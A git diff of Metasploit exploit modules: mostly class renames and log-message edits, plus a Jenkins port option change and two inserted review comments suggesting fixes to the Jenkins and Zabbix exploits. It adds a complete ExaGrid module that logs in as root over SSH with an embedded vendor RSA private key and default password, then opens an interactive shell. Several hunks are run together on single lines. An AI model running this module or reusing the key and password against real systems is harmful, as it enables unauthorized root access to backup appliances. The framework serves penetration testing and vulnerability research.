+++ b/modules/exploits/linux/local/hp_smhstart.rb
@@ -8,7 +8,7 @@ require 'rex'
 require 'msf/core/exploit/local/linux'
 require 'msf/core/exploit/exe'
-class Metasploit4 < Msf::Exploit::Local
+class MetasploitModule < Msf::Exploit::Local
 include Msf::Exploit::EXE
 include Msf::Post::File
diff --git a/modules/exploits/linux/local/kloxo_lxsuexec.rb b/modules/exploits/linux/local/kloxo_lxsuexec.rb
index b9f5606758..94c13c69c8 100644
--- a/modules/exploits/linux/local/kloxo_lxsuexec.rb
+++ b/modules/exploits/linux/local/kloxo_lxsuexec.rb
@@ -8,7 +8,7 @@ require 'rex'
 require 'msf/core/exploit/local/linux'
 require 'msf/core/exploit/exe'
-class Metasploit4 < Msf::Exploit::Local
+class MetasploitModule < Msf::Exploit::Local
 include Msf::Exploit::EXE
 include Msf::Post::File
diff --git a/modules/exploits/linux/local/pkexec.rb b/modules/exploits/linux/local/pkexec.rb
index a4985734e7..fef8cf0a34 100644
--- a/modules/exploits/linux/local/pkexec.rb
+++ b/modules/exploits/linux/local/pkexec.rb
@@ -9,7 +9,7 @@ require 'msf/core/exploit/local/linux'
-class Metasploit4 < Msf::Exploit::Local
+class MetasploitModule < Msf::Exploit::Local
 Rank = GreatRanking
 include Msf::Exploit::EXE
diff --git a/modules/exploits/linux/local/sock_sendpage.rb b/modules/exploits/linux/local/sock_sendpage.rb
index 9c9fb6bbe7..b55bc4d413 100644
--- a/modules/exploits/linux/local/sock_sendpage.rb
+++ b/modules/exploits/linux/local/sock_sendpage.rb
@@ -9,7 +9,7 @@ require 'msf/core/exploit/local/linux_kernel'
 require 'msf/core/exploit/local/linux'
 require 'msf/core/exploit/exe'
-class Metasploit4 < Msf::Exploit::Local
+class MetasploitModule < Msf::Exploit::Local
 Rank = GreatRanking
 include Msf::Exploit::EXE
diff --git a/modules/exploits/linux/local/sophos_wpa_clear_keys.rb b/modules/exploits/linux/local/sophos_wpa_clear_keys.rb
index 655f0c719e..c08cb2c8d7 100644
--- a/modules/exploits/linux/local/sophos_wpa_clear_keys.rb
+++ b/modules/exploits/linux/local/sophos_wpa_clear_keys.rb
@@ -6,7 +6,7 @@ require 'msf/core'
 require 'rex'
-class Metasploit4 < Msf::Exploit::Local
+class MetasploitModule < Msf::Exploit::Local
 Rank = ExcellentRanking
 include Msf::Exploit::EXE
diff --git a/modules/exploits/linux/local/udev_netlink.rb b/modules/exploits/linux/local/udev_netlink.rb
index e9830d13ba..7e5a5432ae 100644
--- a/modules/exploits/linux/local/udev_netlink.rb
+++ b/modules/exploits/linux/local/udev_netlink.rb
@@ -9,7 +9,7 @@ require 'msf/core/exploit/local/linux_kernel'
 require 'msf/core/exploit/local/linux'
 require 'msf/core/exploit/exe'
-class Metasploit4 < Msf::Exploit::Local
+class MetasploitModule < Msf::Exploit::Local
 Rank = GreatRanking
 include Msf::Exploit::EXE
diff --git a/modules/exploits/linux/local/vmware_mount.rb b/modules/exploits/linux/local/vmware_mount.rb
index 93cb8106d5..66cffb1370 100644
--- a/modules/exploits/linux/local/vmware_mount.rb
+++ b/modules/exploits/linux/local/vmware_mount.rb
@@ -6,7 +6,7 @@ require 'msf/core'
 require 'rex'
-class Metasploit4 < Msf::Exploit::Local
+class MetasploitModule < Msf::Exploit::Local
 include Msf::Exploit::EXE
 include Msf::Post::File
diff --git a/modules/exploits/linux/local/zpanel_zsudo.rb b/modules/exploits/linux/local/zpanel_zsudo.rb
index 7a00c6d689..4a04be62c5 100644
--- a/modules/exploits/linux/local/zpanel_zsudo.rb
+++ b/modules/exploits/linux/local/zpanel_zsudo.rb
@@ -8,7 +8,7 @@ require 'rex'
 require 'msf/core/exploit/exe'
-class Metasploit4 < Msf::Exploit::Local
+class MetasploitModule < Msf::Exploit::Local
 Rank = ExcellentRanking
 include Msf::Exploit::EXE
diff --git a/modules/exploits/linux/misc/accellion_fta_mpipe2.rb b/modules/exploits/linux/misc/accellion_fta_mpipe2.rb
index d60f8cd99d..85c416e432 100644
--- a/modules/exploits/linux/misc/accellion_fta_mpipe2.rb
+++ b/modules/exploits/linux/misc/accellion_fta_mpipe2.rb
@@ -9,7 +9,7 @@ require 'msf/core'
 require 'openssl'
 require 'rexml/element'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::Remote::Udp
diff --git a/modules/exploits/linux/misc/drb_remote_codeexec.rb b/modules/exploits/linux/misc/drb_remote_codeexec.rb
index f1e7fa938d..fded503b2e 100644
--- a/modules/exploits/linux/misc/drb_remote_codeexec.rb
+++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb
@@ -6,7 +6,7 @@ require 'msf/core'
 require 'drb/drb'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 def initialize(info = {})
diff --git a/modules/exploits/linux/misc/gld_postfix.rb b/modules/exploits/linux/misc/gld_postfix.rb
index d0fe8ca222..96b42453d6 100644
--- a/modules/exploits/linux/misc/gld_postfix.rb
+++ b/modules/exploits/linux/misc/gld_postfix.rb
@@ -7,7 +7,7 @@ require 'msf/core'
- class Metasploit3 < Msf::Exploit::Remote
+ class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/linux/misc/hikvision_rtsp_bof.rb b/modules/exploits/linux/misc/hikvision_rtsp_bof.rb
index 5ff60004ac..22da78f4b0 100644
--- a/modules/exploits/linux/misc/hikvision_rtsp_bof.rb
+++ b/modules/exploits/linux/misc/hikvision_rtsp_bof.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit4 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Exploit::Remote::Tcp
diff --git a/modules/exploits/linux/misc/hp_data_protector_cmd_exec.rb b/modules/exploits/linux/misc/hp_data_protector_cmd_exec.rb
index a41272c31f..bcd21a3f2d 100644
--- a/modules/exploits/linux/misc/hp_data_protector_cmd_exec.rb
+++ b/modules/exploits/linux/misc/hp_data_protector_cmd_exec.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb b/modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb
index c48287ca88..e5713e21a6 100644
--- a/modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb
+++ b/modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::Udp
diff --git a/modules/exploits/linux/misc/hp_vsa_login_bof.rb b/modules/exploits/linux/misc/hp_vsa_login_bof.rb
index 6798e4ff53..9c698a5f23 100644
--- a/modules/exploits/linux/misc/hp_vsa_login_bof.rb
+++ b/modules/exploits/linux/misc/hp_vsa_login_bof.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/linux/misc/hplip_hpssd_exec.rb b/modules/exploits/linux/misc/hplip_hpssd_exec.rb
index 35658aaeda..2c591b6186 100644
--- a/modules/exploits/linux/misc/hplip_hpssd_exec.rb
+++ b/modules/exploits/linux/misc/hplip_hpssd_exec.rb
@@ -7,7 +7,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/linux/misc/ib_inet_connect.rb b/modules/exploits/linux/misc/ib_inet_connect.rb
index b03053e9be..6804678d9c 100644
--- a/modules/exploits/linux/misc/ib_inet_connect.rb
+++ b/modules/exploits/linux/misc/ib_inet_connect.rb
@@ -7,7 +7,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/linux/misc/ib_jrd8_create_database.rb b/modules/exploits/linux/misc/ib_jrd8_create_database.rb
index f29e9e831b..abaa69dc85 100644
--- a/modules/exploits/linux/misc/ib_jrd8_create_database.rb
+++ b/modules/exploits/linux/misc/ib_jrd8_create_database.rb
@@ -7,7 +7,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/linux/misc/ib_open_marker_file.rb b/modules/exploits/linux/misc/ib_open_marker_file.rb
index 745eebb2f2..68002ee8b1 100644
--- a/modules/exploits/linux/misc/ib_open_marker_file.rb
+++ b/modules/exploits/linux/misc/ib_open_marker_file.rb
@@ -7,7 +7,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/linux/misc/ib_pwd_db_aliased.rb b/modules/exploits/linux/misc/ib_pwd_db_aliased.rb
index 0c38798c19..6ea756791d 100644
--- a/modules/exploits/linux/misc/ib_pwd_db_aliased.rb
+++ b/modules/exploits/linux/misc/ib_pwd_db_aliased.rb
@@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/jenkins_java_deserialize.rb b/modules/exploits/linux/misc/jenkins_java_deserialize.rb index c7eec77106..54ac018b40 100644 --- a/modules/exploits/linux/misc/jenkins_java_deserialize.rb +++ b/modules/exploits/linux/misc/jenkins_java_deserialize.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp @@ -52,10 +52,18 @@ class Metasploit3 < Msf::Exploit::Remote OptString.new('TEMP', [true, 'Folder to write the payload to', '/tmp']), Opt::RPORT('8080') ], self.class) + + register_advanced_options([ + OptPort.new('XJenkinsCliPort', [false, 'The X-Jenkins-CLI port. If this is set, the TARGETURI option is ignored.']) + ], self.class) + end + + def cli_port + @jenkins_cli_port || datastore['XJenkinsCliPort'] end def exploit - unless vulnerable? + if cli_port == 0 && !vulnerable? fail_with(Failure::Unknown, "#{peer} - Jenkins is not vulnerable, aborting...") end invoke_remote_method(set_payload) @@ -155,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote def invoke_remote_method(serialized_java_stream) begin - socket = connect(true, {'RPORT' => @jenkins_cli_port}) + socket = connect(true, {'RPORT' => cli_port}) print_status 'Sending headers...' socket.put(read_bin_file('serialized_jenkins_header')) diff --git a/modules/exploits/linux/misc/lprng_format_string.rb b/modules/exploits/linux/misc/lprng_format_string.rb index ea1f0cd5df..f40fecdcba 100644 --- a/modules/exploits/linux/misc/lprng_format_string.rb +++ b/modules/exploits/linux/misc/lprng_format_string.rb 
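Review bot: In jenkins_java_deserialize.rb the new guard `if cli_port == 0 && !vulnerable?` runs the `vulnerable?` probe only when `cli_port` is exactly `0`, but `XJenkinsCliPort` is registered in the same `@@ -52,10 +52,18 @@` hunk without a default value. If an unset option reads back as `nil` (presumably, since no default is declared), the probe is skipped and `connect(true, {'RPORT' => cli_port})` in the `@@ -155,7 +163,7 @@` hunk is called with no port. Either declare a default of `0` on the option or make the test nil-safe, for example `if cli_port.to_i == 0 && !vulnerable?`. A short comment on `cli_port` saying that `@jenkins_cli_port` takes precedence over the datastore value whenever it is set would also help the next reader. `exploit` continues past the end of the hunk.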
@@ -7,7 +7,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/linux/misc/mongod_native_helper.rb b/modules/exploits/linux/misc/mongod_native_helper.rb
index ff457795de..331e842c2f 100644
--- a/modules/exploits/linux/misc/mongod_native_helper.rb
+++ b/modules/exploits/linux/misc/mongod_native_helper.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/linux/misc/nagios_nrpe_arguments.rb b/modules/exploits/linux/misc/nagios_nrpe_arguments.rb
index 2048a5c6fc..3ac5320c90 100644
--- a/modules/exploits/linux/misc/nagios_nrpe_arguments.rb
+++ b/modules/exploits/linux/misc/nagios_nrpe_arguments.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'zlib'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/linux/misc/netsupport_manager_agent.rb b/modules/exploits/linux/misc/netsupport_manager_agent.rb
index 1ab5730b3b..abfa4247a6 100644
--- a/modules/exploits/linux/misc/netsupport_manager_agent.rb
+++ b/modules/exploits/linux/misc/netsupport_manager_agent.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = AverageRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb b/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb
index 479740e771..3b1ea17ab1 100644
--- a/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb
+++ b/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/sercomm_exec.rb b/modules/exploits/linux/misc/sercomm_exec.rb index 39e294bd2b..ed0637d842 100644 --- a/modules/exploits/linux/misc/sercomm_exec.rb +++ b/modules/exploits/linux/misc/sercomm_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/zabbix_server_exec.rb b/modules/exploits/linux/misc/zabbix_server_exec.rb index 7ee164b10b..0826b3cb16 100644 --- a/modules/exploits/linux/misc/zabbix_server_exec.rb +++ b/modules/exploits/linux/misc/zabbix_server_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote cmd = "echo #{clue}" connect - vprint_status("#{peer} - Sending 'Command' request...") + vprint_status("Sending 'Command' request...") res = send_command(sock, node_id, cmd) disconnect @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Vulnerable elsif res =~ /-1/ and res=~ /NODE (\d*)/ node_id = $1 - vprint_good("#{peer} - Node ID #{node_id} discovered") + vprint_good("Node ID #{node_id} discovered") else return Exploit::CheckCode::Safe end @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote # Retry with the good node_id connect - vprint_status("#{peer} - Sending 'Command' request with discovered Node ID...") + vprint_status("Sending 'Command' request with discovered Node ID...") res = send_command(sock, node_id, cmd) disconnect if res and res =~ /#{clue}/ 
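Review bot: The pattern `res=~ /NODE (\d*)/` kept as context in the zabbix_server_exec.rb `@@ -92,7 +92,7 @@` hunk accepts an empty capture, so `node_id = $1` can become an empty string while the edited `vprint_good` still reports a discovered node ID. Requiring at least one digit avoids that: `elsif res =~ /-1/ and res =~ /NODE (\d+)/`. The same expression appears in the `@@ -117,16 +117,16 @@` hunk of this file and would take the same change. Both enclosing methods start outside their hunks.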
@@ -117,16 +117,16 @@ class Metasploit3 < Msf::Exploit::Remote cmd = payload.encoded connect - print_status("#{peer} - Sending 'Command' request...") + print_status("Sending 'Command' request...") res = send_command(sock, node_id, cmd) disconnect if res and res =~ /-1/ and res=~ /NODE (\d*)/ # Retry with the good node_id node_id = $1 - print_good("#{peer} - Node ID #{node_id} discovered") + print_good("Node ID #{node_id} discovered") connect - print_status("#{peer} - Sending 'Command' request with discovered Node ID...") + print_status("Sending 'Command' request with discovered Node ID...") res = send_command(sock, node_id, cmd) disconnect end @@ -134,10 +134,10 @@ class Metasploit3 < Msf::Exploit::Remote # Read command output from socket if cmd/unix/generic payload was used if (datastore['CMD']) if res and res =~ /\x30\xad/ - print_good("#{peer} - Command executed successfully") + print_good("Command executed successfully") print_status("Output:\n#{res.split("\x30\xad").last}") else - print_error("#{peer} - Failed to execute the command") + print_error("Failed to execute the command") end end diff --git a/modules/exploits/linux/mysql/mysql_yassl_getname.rb b/modules/exploits/linux/mysql/mysql_yassl_getname.rb index 4df096710f..61ad7081f3 100644 --- a/modules/exploits/linux/mysql/mysql_yassl_getname.rb +++ b/modules/exploits/linux/mysql/mysql_yassl_getname.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/mysql/mysql_yassl_hello.rb b/modules/exploits/linux/mysql/mysql_yassl_hello.rb index bd086efcc5..9b6811b040 100644 --- a/modules/exploits/linux/mysql/mysql_yassl_hello.rb +++ b/modules/exploits/linux/mysql/mysql_yassl_hello.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp 
diff --git a/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb b/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb
index e4a4c225b8..b3e42f2ac6 100644
--- a/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb
+++ b/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/linux/postgres/postgres_payload.rb b/modules/exploits/linux/postgres/postgres_payload.rb
index 0194930466..6f781a8e47 100644
--- a/modules/exploits/linux/postgres/postgres_payload.rb
+++ b/modules/exploits/linux/postgres/postgres_payload.rb
@@ -6,7 +6,7 @@ require 'msf/core'
 require 'msf/core/exploit/postgres'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::Remote::Postgres
diff --git a/modules/exploits/linux/pptp/poptop_negative_read.rb b/modules/exploits/linux/pptp/poptop_negative_read.rb
index 59fc651054..1960848adf 100644
--- a/modules/exploits/linux/pptp/poptop_negative_read.rb
+++ b/modules/exploits/linux/pptp/poptop_negative_read.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb b/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb
index bf98f0278a..5552ff0bbc 100644
--- a/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb
+++ b/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb
@@ -7,7 +7,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::Brute
diff --git a/modules/exploits/linux/samba/chain_reply.rb b/modules/exploits/linux/samba/chain_reply.rb
index ae73ad1779..5f6e867f48 100644
--- a/modules/exploits/linux/samba/chain_reply.rb
+++ b/modules/exploits/linux/samba/chain_reply.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::SMB::Client
diff --git a/modules/exploits/linux/samba/lsa_transnames_heap.rb b/modules/exploits/linux/samba/lsa_transnames_heap.rb
index ed72293621..5a9c5dfb6a 100644
--- a/modules/exploits/linux/samba/lsa_transnames_heap.rb
+++ b/modules/exploits/linux/samba/lsa_transnames_heap.rb
@@ -7,7 +7,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::DCERPC
diff --git a/modules/exploits/linux/samba/setinfopolicy_heap.rb b/modules/exploits/linux/samba/setinfopolicy_heap.rb
index b5bbdc6329..8dd9476745 100644
--- a/modules/exploits/linux/samba/setinfopolicy_heap.rb
+++ b/modules/exploits/linux/samba/setinfopolicy_heap.rb
@@ -7,7 +7,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::DCERPC
diff --git a/modules/exploits/linux/samba/trans2open.rb b/modules/exploits/linux/samba/trans2open.rb
index 63f0fdc1a8..e89a00faea 100644
--- a/modules/exploits/linux/samba/trans2open.rb
+++ b/modules/exploits/linux/samba/trans2open.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::Remote::SMB::Client
diff --git a/modules/exploits/linux/smtp/exim4_dovecot_exec.rb b/modules/exploits/linux/smtp/exim4_dovecot_exec.rb
index 2823d626f0..2759efc69c 100644
--- a/modules/exploits/linux/smtp/exim4_dovecot_exec.rb
+++ b/modules/exploits/linux/smtp/exim4_dovecot_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Smtp diff --git a/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb b/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb index 5cb602e0b1..79540ed980 100644 --- a/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb +++ b/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp @@ -97,7 +97,7 @@ class Metasploit4 < Msf::Exploit::Remote rescue peer = "#{rhost}:#{rport}" - vprint_status("#{peer} - Caught #{$!.class}: #{$!.message}") + vprint_status("Caught #{$!.class}: #{$!.message}") ensure smtp_disconnect diff --git a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb index 4d77912786..9e343f2aab 100644 --- a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb +++ b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Auxiliary::Report Rank = ExcellentRanking diff --git a/modules/exploits/linux/ssh/exagrid_known_privkey.rb b/modules/exploits/linux/ssh/exagrid_known_privkey.rb new file mode 100644 index 0000000000..7fc0d39526 --- /dev/null +++ b/modules/exploits/linux/ssh/exagrid_known_privkey.rb 
@@ -0,0 +1,183 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'net/ssh' + + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, { + 'Name' => 'ExaGrid Known SSH Key and Default Password', + 'Description' => %q{ + ExaGrid ships a public/private key pair on their backup appliances to + allow passwordless authentication to other ExaGrid appliances. Since + the private key is easily retrievable, an attacker can use it to gain + unauthorized remote access as root. Additionally, this module will + attempt to use the default password for root, 'inflection'. + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => true, + 'Targets' => [ [ "Universal", {} ] ], + 'Payload' => + { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find', + }, + }, + 'Author' => ['egypt'], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2016-1560' ], # password + [ 'CVE', '2016-1561' ], # private key + [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials' ] + ], + 'DisclosureDate' => "Apr 07 2016", + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, + 'DefaultTarget' => 0 + })) + + register_options( + [ + # Since we don't include Tcp, we have to register this manually + Opt::RHOST(), + Opt::RPORT(22) + ], self.class + ) + + register_advanced_options( + [ + OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), + OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) + ] + ) + + end + + # helper methods that normally come from Tcp + def rhost + datastore['RHOST'] + end + def rport + datastore['RPORT'] + end + + def do_login(user) + ssh_options 
= { + auth_methods: ['publickey', 'password'], + config: false, + disable_agent: true, + key_data: [ key_data ], + msfmodule: self, + msframework: framework, + password: 'inflection', + port: rport, + proxies: datastore['Proxies'], + record_auth_info: true, + } + ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG'] + + begin + ssh_socket = nil + ::Timeout.timeout(datastore['SSH_TIMEOUT']) do + ssh_socket = Net::SSH.start(rhost, user, ssh_options) + end + rescue Rex::ConnectionError + return + rescue Net::SSH::Disconnect, ::EOFError + print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" + return + rescue ::Timeout::Error + print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" + return + rescue Net::SSH::AuthenticationFailed + print_error "#{rhost}:#{rport} SSH - Failed authentication" + rescue Net::SSH::Exception => e + print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" + return + end + + if ssh_socket + + # Create a new session from the socket, then dump it. + conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/bash -i', true) + ssh_socket = nil + + return conn + else + return false + end + end + + # Ghetto hack to prevent the shell detection logic from hitting false + # negatives due to weirdness with ssh sockets. We already know it's a shell + # because auth succeeded by this point, so no need to do the check anyway. + module TrustMeItsAShell + def _check_shell(*args) + true + end + end + + def exploit + payload_instance.extend(TrustMeItsAShell) + + conn = do_login("root") + if conn + print_good "Successful login" + service_data = { + address: rhost, + port: rport, + protocol: 'tcp', + service_name: 'ssh', + workspace_id: myworkspace_id, + } + credential_data = { + username: 'root', + private_type: (conn.ssh.auth_info[:method] == "publickey" ? :ssh_key : :password), + private_data: (conn.ssh.auth_info[:method] == "publickey" ? 
key_data : 'inflection'), + origin_type: :service, + module_fullname: fullname, + }.merge(service_data) + + core = create_credential(credential_data) + login_data = { + core: core, + last_attempted: Time.now, + }.merge(service_data) + + create_credential_login(login_data) + + handler(conn.lsock) + end + end + + def key_data + <<EOF +-----BEGIN RSA PRIVATE KEY----- +MIICWAIBAAKBgGdlD7qeGU9f8mdfmLmFemWMnz1tKeeuxKznWFI+6gkaagqjAF10 +hIruzXQAik7TEBYZyvw9SvYU6MQFsMeqVHGhcXQ5yaz3G/eqX0RhRDn5T4zoHKZa +E1MU86zqAUdSXwHDe3pz5JEoGl9EUHTLMGP13T3eBJ19MAWjP7Iuji9HAgElAoGA +GSZrnBieX2pdjsQ55/AJA/HF3oJWTRysYWi0nmJUmm41eDV8oRxXl2qFAIqCgeBQ +BWA4SzGA77/ll3cBfKzkG1Q3OiVG/YJPOYLp7127zh337hhHZyzTiSjMPFVcanrg +AciYw3X0z2GP9ymWGOnIbOsucdhnbHPuSORASPOUOn0CQQC07Acq53rf3iQIkJ9Y +iYZd6xnZeZugaX51gQzKgN1QJ1y2sfTfLV6AwsPnieo7+vw2yk+Hl1i5uG9+XkTs +Ry45AkEAkk0MPL5YxqLKwH6wh2FHytr1jmENOkQu97k2TsuX0CzzDQApIY/eFkCj +QAgkI282MRsaTosxkYeG7ErsA5BJfwJAMOXYbHXp26PSYy4BjYzz4ggwf/dafmGz +ebQs+HXa8xGOreroPFFzfL8Eg8Ro0fDOi1lF7Ut/w330nrGxw1GCHQJAYtodBnLG +XLMvDHFG2AN1spPyBkGTUOH2OK2TZawoTmOPd3ymK28LriuskwxrceNb96qHZYCk +86DC8q8p2OTzYwJANXzRM0SGTqSDMnnid7PGlivaQqfpPOx8MiFR/cGr2dT1HD7y +x6f/85mMeTqamSxjTJqALHeKPYWyzeSnUrp+Eg== +-----END RSA PRIVATE KEY----- +EOF + end + +end diff --git a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb index 7a460a0ac6..db95be34b6 100644 --- 